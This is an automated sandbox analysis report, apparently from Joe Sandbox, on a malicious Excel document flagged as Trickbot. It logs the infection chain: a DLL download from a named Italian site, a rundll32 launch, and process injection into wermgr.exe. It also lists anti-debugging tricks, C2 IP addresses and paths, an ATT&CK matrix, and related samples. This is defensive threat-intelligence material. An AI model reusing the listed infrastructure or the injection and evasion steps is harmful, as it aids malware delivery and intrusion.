                Source: C:\Windows\System32\wermgr.exeRDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F5B38EE8180h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F5B38EE0016h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E84B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E84B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E847DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060 SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: FF2D93F8
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: wermgr.exe, 00000006.00000002.2350242513.00000000008A0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2350242513.00000000008A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2350242513.00000000008A0000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exeQueries volume information: C:\ VolumeInformation

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000003.2083602374.00000000004A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2087529774.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2087786589.0000000000958000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2087638222.0000000000470000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2083610400.00000000004A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000003.2083602374.00000000004A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2087529774.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2087786589.0000000000958000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2087638222.0000000000470000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2083610400.00000000004A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting21Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingSecurity Software Discovery12Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection212Disable or Modify Tools2LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Extra Window Memory Injection1Access Token Manipulation1Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection212NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsSystem Information Discovery113SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 355601 Sample: SecuriteInfo.com.Exploit.Si... Startdate: 20/02/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Antivirus detection for URL or domain 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 8 other signatures 2->44 8 EXCEL.EXE 84 41 2->8         started        process3 dnsIp4 34 chipmania.it 185.81.0.78, 49165, 80 SERVERPLAN-ASIT Italy 8->34 36 www.chipmania.it 8->36 24 C:\Users\user\BASE.BABAA, PE32 8->24 dropped 26 C:\Users\user\AppData\Local\...\10[1].jjkes, PE32 8->26 dropped 50 Document exploit detected (process start blacklist hit) 8->50 52 Document exploit detected (UrlDownloadToFile) 8->52 13 rundll32.exe 8->13         started        file5 signatures6 process7 process8 15 rundll32.exe 13->15         started        signatures9 54 Writes to foreign memory regions 15->54 56 Allocates memory in foreign processes 15->56 18 wermgr.exe 15->18         started        21 wermgr.exe 15->21         started        process10 dnsIp11 46 Tries to detect virtualization through RDTSC time measurements 18->46 48 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 18->48 28 108.170.20.75, 443 SSASN2US United States 21->28 30 200.52.147.93, 443, 49170 RedesyTelecomunicacionesHN Honduras 21->30 32 185.163.45.138, 443, 49168, 49169 MIVOCLOUDMD Moldova Republic of 21->32 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls11%VirustotalBrowse
                SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls24%ReversingLabsDocument-Word.Downloader.EncDoc

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes6%ReversingLabsWin32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA6%ReversingLabsWin32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                chipmania.it1%VirustotalBrowse
                www.chipmania.it2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://200.52.147.93/rob60/472847_W617601.BDA8D11BBC2A2B9FB3BF7A79DA4C43E9/5/file/0%Avira URL Cloudsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://www.chipmania.it/mails/open.php5%VirustotalBrowse
                http://www.chipmania.it/mails/open.php100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                chipmania.it
                185.81.0.78
                truefalseunknown
                www.chipmania.it
                unknown
                unknownfalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.chipmania.it/mails/open.phptrue
                • 5%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2088833322.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087971789.0000000002207000.00000002.00000001.sdmpfalse
                  high
                  http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpfalse
                    high
                    https://200.52.147.93/rob60/472847_W617601.BDA8D11BBC2A2B9FB3BF7A79DA4C43E9/5/file/wermgr.exe, 00000006.00000002.2350208217.000000000049D000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://investor.msn.comrundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpfalse
                      high
                      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpfalse
                        high
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2088833322.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087971789.0000000002207000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2088833322.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087971789.0000000002207000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.com/rundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpfalse
                            high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            108.170.20.75
                            unknownUnited States
                            20454SSASN2UStrue
                            185.81.0.78
                            unknownItaly
                            52030SERVERPLAN-ASITfalse
                            185.163.45.138
                            unknownMoldova Republic of
                            39798MIVOCLOUDMDtrue
                            200.52.147.93
                            unknownHonduras
                            27932RedesyTelecomunicacionesHNtrue

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:355601
                            Start date:20.02.2021
                            Start time:02:12:46
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 35s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665 (renamed file extension from 29665 to xls)
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLS@9/7@1/4
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 10% (good quality ratio 7.7%)
                            • Quality average: 72%
                            • Quality standard deviation: 41%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • TCP Packets have been reduced to 100

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            02:13:41API Interceptor1x Sleep call for process: rundll32.exe modified
                            02:13:41API Interceptor8x Sleep call for process: wermgr.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            108.170.20.75SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                              SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                  SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                    SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                      Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                        Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                          SecuriteInfo.com.Heur.28366.xlsGet hashmaliciousBrowse
                                            SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                              SecuriteInfo.com.Heur.7735.xlsGet hashmaliciousBrowse
                                                Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                  Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                        upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                            att-1664057138.xlsGet hashmaliciousBrowse
                                                              att-226609285.xlsGet hashmaliciousBrowse
                                                                185.81.0.78SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                Sign-636.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php
                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                • www.chipmania.it/mails/open.php

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                RedesyTelecomunicacionesHNSecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                SecuriteInfo.com.Exploit.Siggen3.10048.18756.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                SecuriteInfo.com.Heur.30904.xlsGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                P4fZLHrU6d.exeGet hashmaliciousBrowse
                                                                • 200.52.147.93
                                                                SSASN2USSecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                kAZyIwSSsf.exeGet hashmaliciousBrowse
                                                                • 108.170.20.72
                                                                SecuriteInfo.com.Heur.28366.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Heur.7735.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                DocuSign_1618411389_250497852.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.72
                                                                DocuSign_1329880746_256921564.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.72
                                                                upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                att-1664057138.xlsGet hashmaliciousBrowse
                                                                • 108.170.20.75
                                                                SERVERPLAN-ASITSecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                Sign-636.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                • 185.81.0.78
                                                                MIVOCLOUDMDSecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                • 185.163.45.138
                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                • 185.163.45.138
                                                                Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                • 185.163.45.138
                                                                kAZyIwSSsf.exeGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                • 185.163.45.138
                                                                Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                                • 185.163.45.138
                                                                DocuSign_167.xlsGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                DocuSign_1618411389_250497852.xlsGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                DocuSign_198836422_1059763935.xlsGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                DocuSign_139380140_1184163298.xlsGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                DocuSign_1329880746_256921564.xlsGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                6d0000.exeGet hashmaliciousBrowse
                                                                • 185.225.17.3
                                                                ieO61Pwnmq.exeGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                849IlNGgPo.exeGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                CaAmqz52Yk.exeGet hashmaliciousBrowse
                                                                • 94.158.245.54
                                                                questo.doc.exeGet hashmaliciousBrowse
                                                                • 5.252.179.55
                                                                tQdHht8Bwc.exeGet hashmaliciousBrowse
                                                                • 5.181.156.60
                                                                BonusReport.exeGet hashmaliciousBrowse
                                                                • 94.158.245.92
                                                                http://databasegalore.comGet hashmaliciousBrowse
                                                                • 5.252.177.21
                                                                mediasvc copy.dllGet hashmaliciousBrowse
                                                                • 5.181.156.4

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesSecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                          Sign-636.xlsGet hashmaliciousBrowse
                                                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                              Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                  Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                    Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                      C:\Users\user\BASE.BABAASecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
